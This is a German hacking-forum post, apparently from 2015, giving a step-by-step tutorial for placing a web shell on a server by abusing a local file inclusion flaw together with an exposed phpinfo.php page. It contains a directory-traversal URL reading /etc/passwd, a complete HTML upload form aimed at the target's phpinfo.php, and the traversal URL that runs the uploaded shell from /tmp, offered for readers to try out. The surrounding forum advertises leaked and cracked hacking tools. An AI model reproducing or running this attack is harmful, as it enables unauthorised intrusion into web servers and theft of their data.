Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[Tutorial] Shell-Upload über LFI & phpinfo.php

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
InternetFreak

InternetFreak

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    18
  • 21 Beiträge
  • 5 Bedankt

Shell-Upload über LFI & phpinfo.php

 

In diesem Tutorial erkläre ich euch wie ihr eine Shell auf einen Server hochladen könnt, indem ihr eine LFI in verbindung mit der Phpinfo-Site ausnutzt.

 

 

1. Benötigte Angriffspunkte

 

Gehen wir davon aus wir hätten eine LFI auf einer Website entdeckt.

Die URL könnte Beispielsweise so aussehen:


http://www.unsichere-website.de/index.php?page=../../../../../../../../../../etc/passwd

Die aufgerufene Datei sollte jetz auf der Website ausgegeben werden:

hLjqRfU.png

 

Jetzt vergewissern wir und noch ob eine Datei namens phpinfo.php existiert:


http://www.unsichere-website.de/phpinfo.php

Diese sollte in etwa so aussehen:

mP3iAUW.png

 

 

2. Upload einer Shell

 

Um jetzt unsere Shell hochzuladen benutzen wir dieses HTML-Dokument:


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>phpinfo.php - Shell Upload</title>
<style type="text/css">body { background-color: #000000; color: #ffffff; text-align: center; }</style>
</head>
<body>
<h1> After uploading , check the phpinfo.php and search your shell name! </h1><br /><br /><br />
<form action="http://www.unsichere-website.de/phpinfo.php" method="post" enctype="multipart/form-data">
<label for="file">Shell:</label>
<input type="file" name="file" id="file">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

Wir wählen die Shell aus, welche wir auf den Server hochladen wollen und klicken auf Submit:

HCaZ7fl.png

 

Wenn alles funktioniert hat sollten wir jetzt den Namen unserer Shell auf der Phpinfo-Site finden können:

Ny5wBEF.png

 

Wir wir erkennen können, wurde die Shell in das Verzeichnis /tmp/ geladen.

Jetzt müssen wir unsere Shell nurnoch über die LFI aufrufen:


http://www.unsichere-website.de/index.php?page=../../../../../../../../../../tmp/shell.php

Viel Spaß beim ausprobieren.


Bearbeitet von InternetFreak, 15 June 2015 - 02:03 Uhr.

  • PaulaAbdul und Erikson gefällt das

Die Organisationen stecken Millionen von Dollars in Firewalls und Sicherheitssysteme und verschwenden ihr Geld, da keine dieser Maßnahmen das schwächste Glied der Sicherheitskette berücksichtigt: Die Anwender und Systemadministratoren.




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 80 user(s)


    , .:dodo:., <Kevin>, 3rr0r!st, Alsuna, and6578, Ar@m!s, Avni, B1nary, Bypass, Ch!ller, cooky1, Cranky, Crap, Creo, Crunshy, Cube, Cyber Tjak, CyberFlash, cyberwhore, deluxe2222, dev-0, Elite Soldier, Erikson, FalkE, Framerater, Frecy, g0tr00t, gtawelt, harlek1n, herp, Injection, InternetFreak, Irhabi, kingkev0, Klaus, L!x, len0, M@t@zelle, m1dge2, mands, mantwohouse, most_uniQue, n1nja, Neonxen, notfound, openmind, Osed28, PaulaAbdul, pdr0, peppi200, PHIPU, pornoralle, prto, psner, PT9, R3s1stanc3, r3vO, ref0rm, Revofire, Rushkiller1000, Sayco, SirDuke, Slixer, smc2014, Smokyjoe, SPYKEshadow, terratec1991, the.3nd, ueEqlL, VeqasZ, vôl, Xantar, xibit, xMarvvx, xxxsmackxxx, XZV, Zerobyte, ZeroFreez, zyrus
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.